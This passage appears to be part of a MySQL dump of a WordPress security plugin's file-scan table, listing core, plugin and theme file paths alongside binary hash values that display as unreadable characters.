�b����d�]F�i�POZq��','',0,'?'),('���\\��.1��-��:','wp-admin/options-media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�[x�N�:���dw#\\','�R�/Q�O�l��@���c�0�\0a`n�o��<','',0,'?'),('��ΝH�*��*.ځS','wp-admin/includes/bookmark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M\0��V�r�K���','��=�)g��E�S�Y�[p�t%�Q���\"�','',0,'?'),('��dx���eB�ݙϟ5','wp-includes/IXR/class-IXR-clientmulticall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H���q�g��l�t','��ғ\'bO����E�&ƧW0h�	o�\\`��Y��','',0,'?'),('�ɔ/�	yT�5:Dh�','wp-content/plugins/wp-cerber/assets/flags/mn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�{�)YJ����','/ҹ��;9��������\0d�֑�]�>','',0,'?'),('��Ul1�ȕD�bmg�','wp-includes/css/buttons-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��X�WDw����ڭ�','�o� ������!Pc�����\0�i�F9aK����','',0,'?'),('���Ϗ��RCOh����','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/InvalidDatabaseException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��6��.tz��x�o','��;���p^\0��3�Թ�(� ��A���a���w','',0,'?'),('�\nfv�8���1���-I','wp-includes/SimplePie/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','逗z�qŔ��/��','_pe�NO�/�*�mv��ȿ�n6*��zo��n�','',0,'?'),('���U�N,� \\1','wp-content/themes/twentynineteen/sass/forms/_forms.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��n����ŋA�','h��VC{�B�{���4O�b�]=��;X)��(X�','',0,'?'),('�6p���C�$�\Z*�','wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/7_preview.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��p��&r�!�','�?)qw�J��i�����L��B7� ,�NwdǸ','',0,'?'),('�F�[��㵋Pѳ�@�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Postal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�b�P\"��x�Y@0��','�\'���n��*2nԋ����)�a(�_�Iq�ɘ{','',0,'?'),('�`�`\'�l`=��X(','wp-content/plugins/wordfence/views/options/option-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����’�?�@s�ó','aqq�������@.�7T�o=6�\0<��CZ','',0,'?'),('�y��ё�c�j!�\\\'','wp-includes/class-wp-block-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.�״�8��9��','�$-���R̒�~�����N�j��]?=��&','',0,'?'),('�2�D[\"��*\"(��','wp-includes/js/jquery/ui/effect-size.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a;l�@��r%�ݢZ','���cQ>�WYe\Zw\"���`�M�rј^','',0,'?'),('��hJ��D�㰗G� �n','wp-content/plugins/wordfence/lib/wfCentralAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','耳��B/�X�\n`�2r','��>C��]�!��կVMՍ�4U��U����\Z','',0,'?'),('���ZQ4��\\(�܇','wp-admin/network/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϯ\r��&Z3�r�\"�','�:��%�;Ki�W@>�U;������#�>','',0,'?'),('��[0��^������','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AnonymousIp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�mg�ݜ|�<뼸Dh','�+��%�G�<t�1]�I�5m�\Z�}��E�>�;','',0,'?'),('��Ƞ\">�gݠ���','wp-content/themes/twentytwentyone/assets/css/custom-color-overrides.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�*�;��8I�w�\ZA�','�st4�ݎ%�o�@L��I�ߟ�u�\Z�\\o�8�D','',0,'?'),('��/�؊!�N>�\n�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f<_2S^I��Z','��iݯ��8{��i���q!d���Ս��Az�','',0,'?'),('�\'}j��=A>\r���9','wp-content/plugins/wp-cerber/assets/flags/vi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�.f���&� S��j','����)Am{���M�D�&��ʑaG\rmM�f','',0,'?'),('���U�N�͐e��','wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/8_preview.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e6娈Hb,FQƂ%','�0Ր�qBI/�5�/�V��õ\n?��','',0,'?'),('�!�VTg�\"O\r�.�2L','wp-content/plugins/wp-cerber/assets/flags/pn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E~&X��l�x','g���\'G��5�ɒ<�tȺyol���|U�ӫ','',0,'?'),('�\Z���l���3Ȋ�','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�UՒ�JL��m8`v','ӛ�vQ��k��\n��l�]�`Ε��۷�+}�kO�','',0,'?'),('�J|6}�P�,\rٛ','wp-admin/css/colors/_admin.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R)���8 <�67�#\Z�','��]>y-�f�\"�Ny%\r�l��r`������','',0,'?'),('�Z�@����E�ya�B','wp-content/themes/twentynineteen/sass/typography/_headings.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|R��s�x���*%�','�pЎ��(�W�\\���	�c�36�\0��\'�f�','',0,'?'),('�\\O�hq��2���.�','wp-content/plugins/wp-cerber/assets/admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J��`���.��/','���>6Q�n��7���2�Sۈ܊�� �','',0,'?'),('�d`#)?�ϳ��0(w��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �oY���-�)EHd','l�,8�E�T��C�eyl�a�S��;)\'\"d�`z��','',0,'?'),('��x�`�f,5ef2��','wp-admin/js/site-health.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T%��dx�P7��/�','����{���]�[mX1!u������n�2f�','',0,'?'),('�����[��:�����q','wp-admin/includes/class-wp-plugins-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]5�g��-M���','��?`:3bO���Y�.��*��/��u��Pb_�','',0,'?'),('�������\0+��A�.\\','wp-content/plugins/wp-cerber/assets/flags/qa.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z���%4o�m)�|$I','F��{tT��$(��lVq�5��O�*g','',0,'?'),('���P�Of;���/��','wp-includes/SimplePie/Decode/HTML/Entities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jыp&y������U','��WP��*P=Nϻ;\Z���i��8��2�_��� ','',0,'?'),('��.yz�_��jz�|�','wp-content/themes/twentynineteen/images/pattern_03.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�Y)f�x��:.+��','4]ou�\'�u�����mN��ZV;Ke��jW>T','',0,'?'),('��ӑ�?���=�','wp-includes/block-patterns/heading-paragraph.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����?z�I�����E','�i�,��m�O���#�?Vb�,�C-ܢcž\Zh�','',0,'?'),('��Z��(���|��Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QU�p~ocÊ4�Nt��','�L��n�l2@ΐ�>h�i,uJY�H��\\�L�,�B','',0,'?'),('�┬�E��+,����','wp-content/plugins/wp-cerber/jetflow.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U���5����� ��g','�\'e^Ƈ/�G�Ow��=|��_(ӋgW���A','',0,'?'),('��\\ ��Iѻ���,','wp-includes/class-simplepie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��\\��Jġ�љ�','�8l�n-�	�o�=��8,;h�\'LFR#�ʜB','',0,'?'),('���\\�]^�T�ꥊ�','wp-includes/js/dist/vendor/wp-polyfill-url.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rt\0X��d�xR`��','��b�ՔW�?��gtRċ\\}�D�E�TӇ��=','',0,'?'),('�$=Z��Z�Hɼ���f','wp-content/themes/twentytwentyone/assets/sass/06-components/navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������;Y�lE�','�_��E>���@��[)�$�=�A�L�	C�Mp�','',0,'?'),('�$lv��EC۩bN','wp-content/themes/twentytwenty/template-parts/footer-menus-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WC��B����I�mU','���z�jy�I���`F�����.\rCC!qc_','',0,'?'),('�/&����2�ѡ\rgDs','wp-includes/http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-��X㑩��/��2','? *�~HxJF�z����h�mp�ǖ}����','',0,'?'),('�5����L���;rk�ȳ','wp-content/themes/magazine-hoot/hybrid/customize/control-radio-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i;��ţ��v�LW)','�{��H��5��}\'��P��1��|��]�','',0,'?'),('�5قaܨϘ�	#��bu','wp-includes/js/dist/compose.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i\0 ��Q�a�5���?','��z~�Յ\0>�����n�ۣ�3\Z؉:C�\Z�','',0,'?'),('�?q�Hl��(�2�m','wp-content/plugins/wp-cerber/assets/flags/pg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;[����*��','��9O#���x�_���v	��~�%W\Z���','',0,'?'),('�b�E��3�g\'cZ (��','wp-content/plugins/akismet/views/get.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ӵ��q��\'7��\0�Y>�','���x����[�%�����@��c����','',0,'?'),('�����r��~��\Z','wp-content/plugins/wp-cerber/assets/flags/ws.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2���Mr�Z�Yܑz�r','$�!�9��d9��8E�\".0�����J��K`','',0,'?'),('����=��Ѷ�8$�','wp-includes/js/dist/vendor/wp-polyfill-node-contains.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���w��%[U��3�','Et������z��fD:x?���o��c�ڋ	8P','',0,'?'),('��?�0|��5uơ��','wp-admin/custom-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','㽫��]0�m7��d','Z�5\"=�\0�T�σqr�/0��Q�X^dn6','',0,'?'),('���qh�n�J�j�','wp-admin/css/nav-menus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۶8��BZ�y��-',']�~*%6�r�+�q�.a�V�s!���Ysk����','',0,'?'),('���<�	�f%�n�O�','wp-admin/includes/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';b�`u����h\'���y','��Z�C��#�9�8H����<��h�,d��2','',0,'?'),('�ÏuL�,�&Ǒ�\r1','wp-admin/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�6���U��3','�D�K���3�́uB!@oP��b��#���~','',0,'?'),('�Ӏ9[�M-g��','wp-includes/js/dist/hooks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'����ʣJ1�iz��','*��F;���1Y#����W��ˈ���o���','',0,'?'),('��%I���}�P�zW��','wp-includes/random_compat/random_bytes_mcrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T�Ԧʙ`�P��L','�b=�-.���X�����T���Yn���P��','',0,'?'),('��+M�%��]�sD00�','wp-includes/blocks/freeform/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oU���ޘx)���\Z�','��Ee��d�._=���r�hQ�]!�+�M<�8','',0,'?'),('�\n��n�=�^�n�N','wp-content/themes/twentytwenty/classes/class-twentytwenty-separator-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:L��?�m&�','8uv��ߜ����_�0-��锴񢷧U�2','',0,'?'),('�(dwI\0:\r��Xx1DC','wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��r�`3�U�$�n��','���B:���BA��xd]��Y�<#�p��8u','',0,'?'),('�3�,���cv�k���','wp-content/plugins/wordfence/views/onboarding/overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��iŮ�9�e`��2�','Z���M�GXL;$xMi|Q�%���ŽY2��$_','',0,'?'),('�WM��{h���(��','wp-content/plugins/wordfence/lib/menu_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�����e�ډT�a��','\nS��x�B�[��)ɩL�6ۖ>���Hϫܥ��','',0,'?'),('�a�@o��\'��kb��','wp-includes/js/jquery/jquery-migrate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y��k~�x�$K^-3�}','��P�y���D\\\\�cd�~��P���`7 �F/','',0,'?'),('��i/�pEt�\n�l�','wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r���0mb74$','�{h��D��X�^�w���6D�fc�@Q��\r�f','',0,'?'),('����2��?!�u�܆\"','wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[(AɊ�����h�','����ͳߘ�Q6̨!*���X�x��MM�u@','',0,'?'),('����^[X��i�	�','wp-admin/themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F���-G;:y^\Z)�','����F�ȳ۬�2U����-��:�1��','',0,'?'),('��:�X��@\0{*�֯�','wp-admin/includes/class-language-pack-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��H�� lO J\rN','�m���%�n\r��؛��qi���m���V&W','',0,'?'),('��4T�(�\\9\'��3�)','wp-admin/css/customize-widgets-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�{����` .�','����=FL�e���c���^&��\Z|\nl��aO�','',0,'?'),('���\0n:T�q}K �@','wp-includes/Requests/Exception/HTTP/408.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@>1d�IX�O��ȷv�','�q���*�lmKңk�\"�M�Q?�p���a؂�4','',0,'?'),('��k{��&��x\n��','wp-includes/class-wp-error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l� &�0?&�c~��','G�bM[G&Jr�F�E����1�r�s�L,t�(�W','',0,'?'),('��$�o��1�T�2]l','wp-content/plugins/wordfence/lib/dashboard/widget_countries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�zTc�I��J��W3','�zU)��i��YQ�;�PXꘞL�v�������','',0,'?'),('���A0f��f`� Kǁ}','wp-content/plugins/wordfence/lib/wfDirectoryIterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n+Z/_��\Zxu��v','��u���;IV��a[�~㵭�TZ\\^�yJ��j','',0,'?'),('�\0��%3[$x\0��.��(','wp-admin/images/marker.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�*O2/�3I2���','~T�@\\��vUI<�pK����a`T�@c��ca�','',0,'?'),('���4�����=��','wp-content/plugins/wordfence/images/icons/ajaxScan.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʖ�Ѵ��~f���i�','�ߩ0�ԍ���Ѧ�ƻH\n�����¡;�','',0,'?'),('�	���Em[�����l�<','wp-includes/js/tinymce/plugins/image/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��ZC�l­}�莐�','y��T��Nz+����⃆��\'��%Y�','',0,'?'),('�D`B�ȥ�\n�b�Ǚ','wp-content/themes/twentynineteen/sass/_normalize.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����Ut _��vO0a','LL�Z�m��h2-s��,+�<�s!@tp�z�G','',0,'?'),('�MQ��HY�_r$K�S�','wp-content/themes/twentytwenty/assets/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�8\\O��^����QR','����@8\Z���!��G�6��ͮe���,\0�5','',0,'?'),('��{�]\\ֵ�	��d��','wp-admin/css/forms-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ՒMwG��2�x͝','ݗ��|\0�[����1��1n|�m�©�O� ','',0,'?'),('�������\"�R�Ŝ','wp-includes/images/crystal/text.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� Ѳ��#�d�%�[�','n1��0��<;�\n��Ip��~�f���⠸��z','',0,'?'),('�%��+~���R1��҉','wp-content/plugins/all-in-one-wp-security-and-firewall/js/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�v%���S�[�̪�Ѿ','wp-includes/ms-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q\n����[�|�J/�','�8f�٣�“��<}.Q��������','',0,'?'),('��~C�>��xh��\r','wp-content/plugins/wp-cerber/assets/flags/bh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tx\n=CS\Z�f��PF|','(���=AEhe�SJ駄�_�Ve2Z�E��&j�','',0,'?'),('��b��[@@�\Z�O�I','wp-content/themes/magazine-hoot/template-parts/loop-meta-shop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�V��0�W�XU/�x','�l��&g&}ex�<��j�H�$v�+	�fߐ�D�','',0,'?'),('���|X%jgu@�CJ�M','wp-includes/js/dist/vendor/react.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d:�K��D��,$',';���\Z��w7��:���[�ܧ/�8��_�@]','',0,'?'),('�ւxRa��ǜ�@','wp-includes/css/dist/editor/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_O7b/��T���m�','_w��^���p�{�,ǣ��{}�:�\0���2�','',0,'?'),('���X\"�-{��$48sx','wp-admin/css/deprecated-media.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k+�H�h����3','�ؖ)_��6h����1��A\\�_lgK�d�kUX�q','',0,'?'),('��42���i�[�O��','wp-content/plugins/wp-cerber/assets/flags/tf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z�``�O��.�˛�','��������r��4�&,lb�Fr~�T<���阈�','',0,'?'),('��Ud��M���S$�l','wp-admin/includes/class-wp-list-table-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�>\r_D\"��Ck��C','\\�;��]\"���(+/��}�˚q5��NS\'�','',0,'?'),('�\0���O��b5o�','wp-content/plugins/wp-cerber/assets/flags/ir.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dV�M�t^,��7�xD','i��֚b5�J��?]����+��H�r8��','',0,'?'),('�\rz��@�_Ð�m�dM','wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�96�f����;���0','mgc%�i\Zn�A��B�@��wF�z�;�y`\rN','',0,'?'),('�@G��t�eY�\\\'>�O','wp-content/plugins/wordfence/lib/wfVersionCheckController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�]Tg���\Z�!��','�m1�X^��s$�	Eh��M���WR�{��^�','',0,'?'),('�O~�LȦ�\"f~|��;','wp-content/themes/twentynineteen/sass/site/header/_site-header.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_���n.�)�U\\!k�','1,����0��љLv��/\r�>%���\"����','',0,'?'),('�Z��Wt�p�N�h','wp-admin/css/nav-menus.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']��\'�]9?�]g�$','���P�a���̬Vch�;������;l','',0,'?'),('����Ȯr��&x�q�','wp-content/plugins/wp-cerber/assets/flags/fi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ќ0C��e���#��','�r\r=O�֓bt����:ٚU$R?�}�t��','',0,'?'),('��Z ��Og\nW�W�2','wp-includes/js/wp-embed-template.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x)�tM�`WXx>�5�\\�','�b.�Ļ�@ߑϐ�E��c\Z1��ŀX�Z\n�8/�','',0,'?'),('��!�h>�iq�8t��n','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0��>��@Ue��U','�țp���˄o<��O\n��Oo{�w=�S','',0,'?'),('���\\��9�ѕ�F�w�','wp-admin/js/revisions.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L��Oez���nUR','�q��:\\��H�-��ƒ�V��i���ԍ�$','',0,'?'),('���%�!ڡG��&�5','wp-content/themes/twentytwenty/assets/css/editor-style-block.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������	,�R��','�j^V�:���M�䌚�0o7Y|R9߀a|��� ','',0,'?'),('�����Ly��RB�9�k','wp-content/plugins/wp-cerber/assets/flags/mh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l�\0oէ��3ˠ','�ܰ�\n\0�\'6G�R���ZH-�`��Ș��	','',0,'?'),('�/=�+HhE��14�ʆ�','wp-content/plugins/wordfence/views/tours/login-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[QTGfS\"�����','�4���4HGM�;]B���FO��d�ƴ6@�','',0,'?'),('�GR�������m)','wp-content/plugins/wp-cerber/assets/flags/kg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8]�/E0%�gQյQ�','�3$��f�Rx)��@\\�e.3\Z�Ω�\r`p�Y','',0,'?'),('�l���M+J��m��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�\'���\'�Q^�o�+^','!3��`DTd�k����3���Z�2�6�}','',0,'?'),('�u������%�(��','wp-content/plugins/wordfence/modules/login-security/css/ionicons.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�ƣٿc;���z���','��N�J�s�@�3	�:h)�7K�<�\\N�+','',0,'?'),('����N���@�(�3�','wp-includes/ID3/module.audio.mp3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O:B঍\0�z�6x`B','�	]����	\0On��6B;���\ZZ$�	2ЯSh','',0,'?'),('��h���)UG@�x��v	','wp-admin/edit-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�8���K��PH�>H','��j\r�+Yg��1��S����t2�f��;�','',0,'?'),('��X��w��E��','wp-includes/blocks/more/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�ݜ����_ť;k)M','�6��6Pa����D���@���f6�{��','',0,'?'),('��or�������籽�','wp-content/plugins/wp-cerber/assets/flags/bq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('��2]hqu:�T6E�U�','wp-content/plugins/wordfence/lib/wfAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[DW\01f�!�`ߜ�','����Ld+,\rO�V���UNxea9̽�+O�C1�','',0,'?'),('�\r[�8�)�r�}8e','wp-content/plugins/wp-cerber/assets/flags/sz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']{W���:��(�Բ�','PJU����I\"�,�����uVo��ƞ�dQ*z','',0,'?'),('�	Ie�ԩ[G���_�6','wp-includes/js/dist/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�60���6�k�/��','�O}���j�\\Eнe��(BL\Z$�핓1','',0,'?'),('�#�AuI.F��/���','wp-includes/js/wp-pointer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8\Z߁@ \r�|�ɛ[d','��O�Ȇm~����gƷ^96��}>|̭/�]��','',0,'?'),('�?L�Aua;z6{����c','wp-content/themes/magazine-hoot/hybrid/inc/functions-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q��<Z���R�\0�','�n%(X[��A�E��k�H�M3�al�V���~','',0,'?'),('�@��,�n\\���+k�','wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9\'�Q8b�/����a�','�3t\\R>��_a��>�\0��|ՑVC�䦇OB','',0,'?'),('�O/�ì�`|g�_\0','wp-includes/Requests/Exception/HTTP/429.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��%|F.àZd����','��!�T��uwm�t5�o\n�2A\"k�ߚz�','',0,'?'),('�Z��S=�\0����v�H','wp-content/plugins/wp-cerber/assets/flags/er.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�Ք#ӕ��?.O�]��','��\0�D?J1�nd�&�%��6\"ᅃ�.��� ','',0,'?'),('�v�FI��2h���n�','wp-content/plugins/wordfence/readme.txt',0,'��R���ݯ6��','��R���ݯ6��','z�O҈|�AL?�n�X>��lKt:%��6','',0,'?'),('�{�1�\"��^���.','wp-includes/class-wp-widget-factory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ե�ᡵ���|��I� ','(H��e3a�Z]��t\\�����\'�d��p���','',0,'?'),('��O�|4ަ�*oҀ�փ','wp-content/themes/magazine-hoot/include/admin/images/qstart-fpmodule.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#��y�u��i�2u�','�;4����xY�bi���910.�y�f@*Z��','',0,'?'),('���s��������v ','wp-includes/blocks/social-links/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<{�Vg3B+z�B��','�I�W�}��Ogzˀ	��h��-��wl','',0,'?'),('��s��I�qF�����','wp-admin/includes/class-theme-installer-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\P\0������E�é��','T���V/@cB����Վ�o��0`��f_���','',0,'?'),('���=V;�����N.K','wp-includes/js/wp-list-revisions.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PbOP�xO�rs7��2','�#��;w�1���.��B���3�f_;�Pf�','',0,'?'),('�����h��١k�','wp-content/plugins/wp-cerber/assets/fb2b.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}d��ΰ��R͵�','Ky�Y	�O~�vx�W�� �<3����PZPZ','',0,'?'),('����7OPs�Ωp��W','wp-content/plugins/wp-cerber/assets/multi/multi.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P?�� a��80�$','*}�AB�/�*o%���;���5��k��;�3','',0,'?'),('��\n�ӛIQED	��','wp-includes/class-wp-comment-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d���!T0^ę��:�','�Q����M�����b?S��_c%��C1`A\0','',0,'?'),('����\\�M�M�F/�I','wp-includes/Requests/Auth/Basic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��x̄�	4U�	k!C','.�йh�dBiHɀ�n�s����᝗�\\���O','',0,'?'),('��nξ8n��Pp\\`z','wp-content/themes/twentytwentyone/assets/css/ie-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N��Fڭ��G��','?���O//��%�N�W0�㍕�M4\'�3�F���','',0,'?'),('��Κ,�Q�a�gl��\Z�','wp-includes/class-smtp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.斚a�q�ݓϠ����','B)HJ����ڐ�R�ps� ����	